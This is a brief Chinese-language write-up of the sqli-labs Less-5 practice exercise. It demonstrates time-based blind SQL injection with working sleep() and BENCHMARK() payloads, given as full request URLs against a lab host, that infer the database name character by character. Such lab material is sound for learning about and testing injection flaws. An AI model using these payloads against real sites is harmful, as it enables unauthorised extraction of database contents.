Less5
下面使用延时盲注演示
利用sleep()函数
sql语句:
1 | and If(ascii(substr(database(),1,1))=116,1,sleep(5)) |
payload请求:
1 | http://47.101.62.20:11567/Less-5/?id=1%27and%20If(ascii(substr(database(),1,1))=116,1,sleep(5))--+ |
当dadabase()的ASCII值不是116就延时5s然后页面返回空。此处改为115是正确返回
利用 BENCHMARK()进行延时注入
sql语句:
1 | UNION SELECT (IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM (select database() as current) as tb1 |
payload请求:
1 | http://47.101.62.20:11567/Less-5/?id=1%27UNION%20SELECT%20(IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE(%27MSG%27,%27by%205%20seconds%27)),null)),2,3%20FROM%20(select%20database()%20as%20current)%20as%20tb1--+ |
这里当返回结果正确的时候会延时5s返回,错误时不延时
